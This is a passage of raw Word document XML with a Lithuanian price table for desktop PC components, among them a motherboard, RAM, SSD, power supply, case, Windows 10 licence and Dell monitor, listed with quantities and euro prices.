          </w:tcPr>
          <w:p w14:paraId="14324375" w14:textId="243F13CC" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1A899A04" w14:textId="0D508D94" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="1DBBE94C" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>121</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">69 </w:t>
            </w:r>
            <w:r w:rsidR="2C653F4D" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="07B332B8" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5535D178" w14:textId="6B6EE545" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Pagrindinė plokštė </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="57616096" w14:textId="6C1092B4" w:rsidR="7A6C51DD" w:rsidRPr="005A5C28" w:rsidRDefault="7A6C51DD" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ASROCK H410M-HVS mATX MB Socket 1200 10th Gen Intel DDR4 2933MHz 1x PCIe 3.0 x16 1 HDMI D-Sub 7.1 CH HD 4 SATA3 4 USB 3.2 Gen1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="278047C0" w14:textId="459AB5D7" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="231BDBFD" w14:textId="679C9425" w:rsidR="4E1881DE" w:rsidRPr="005A5C28" w:rsidRDefault="4E1881DE" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>62</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="17A79F33" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r w:rsidR="2C653F4D" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>9 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="74211FBA" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2D8CFD67" w14:textId="708AD1BA" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Operatyvinė atmintis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="33453C99" w14:textId="0B97AD44" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="6117F267" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>GOODRAM DDR4 DIMM 8GB 2666MHz CL19 HP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="07560CE9" w14:textId="00F0D6C2" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="180E3B8D" w14:textId="41F8A92D" w:rsidR="44DD9FD3" w:rsidRPr="005A5C28" w:rsidRDefault="44DD9FD3" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="457DA482" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="03A8AD60" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>9€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="06F08F68" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="21572867" w14:textId="424A74D8" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Vidinis diskas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="237E95A9" w14:textId="3B896D6B" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="65215C49" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PATRIOT P210 SSD 256GB SATA 3 Internal Solid State Drive 2.5inch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7ED40CFF" w14:textId="2054F297" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="412EFF7E" w14:textId="7C3B7F3E" w:rsidR="60C3DA4D" w:rsidRPr="005A5C28" w:rsidRDefault="60C3DA4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="7A836650" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="2C653F4D" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>9€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="72D3F19F" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3E5C2F93" w14:textId="12FC02E1" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Maitinimo šaltinis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6A586844" w14:textId="1A054BC3" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2E91C6A0" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Fortron HYPER K 500W ATX 12V V2.4 &amp; EPS 12V V2.92, 500 W, Active PFC (&gt;0.9 typical), Protections: OVP/OCP/SCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4A4D4BEE" w14:textId="347AB91E" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="46513090" w14:textId="1372A424" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="51FCBA02" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r w:rsidR="2C653F4D" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="1E9923F6" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="34B90C61" w14:textId="438ACDF1" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Korpusas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3916EA1A" w14:textId="332EBD49" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DEEPCOOL DP-ATX-DSHIELD-V2 ATX Chassis D-SHIELD V2 1x120mm Pre-installed Black Fan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4186CC88" w14:textId="270A5176" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="25F8E1FB" w14:textId="032DD384" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>49€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="64FD4D39" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="550B88F4" w14:textId="1B7947DB" w:rsidR="7956DE56" w:rsidRPr="005A5C28" w:rsidRDefault="7956DE56" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Operacinė sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4AD404D6" w14:textId="24E8779D" w:rsidR="7956DE56" w:rsidRPr="005A5C28" w:rsidRDefault="7956DE56" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Operacinė sistema Microsoft Windows 10 Home 32/64 BIT daugiakalbė, elektroninės licenzijos raktas, galima perkelti į kitą kompiuterį (ne dažniau kaip 90 dienų) atsisiunčiama internetu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="770EDAE8" w14:textId="68A205C9" w:rsidR="7956DE56" w:rsidRPr="005A5C28" w:rsidRDefault="7956DE56" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7105C885" w14:textId="65F39E05" w:rsidR="7956DE56" w:rsidRPr="005A5C28" w:rsidRDefault="7956DE56" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>122</w:t>
            </w:r>
            <w:r w:rsidR="00C351BB" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>69€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="01F8332D" w14:textId="77777777" w:rsidTr="00226B45">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1277" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3A7E26A4" w14:textId="329E96E5" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Monitorius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2512" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="4225754E" w14:textId="59A8FAB6" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="78F06982" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>DELL P2419H</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="476" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="325C5AAA" w14:textId="25450595" w:rsidR="2C653F4D" w:rsidRPr="005A5C28" w:rsidRDefault="2C653F4D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="735" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7076BBDD" w14:textId="39A5D632" w:rsidR="0F18ED80" w:rsidRPr="005A5C28" w:rsidRDefault="0F18ED80" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
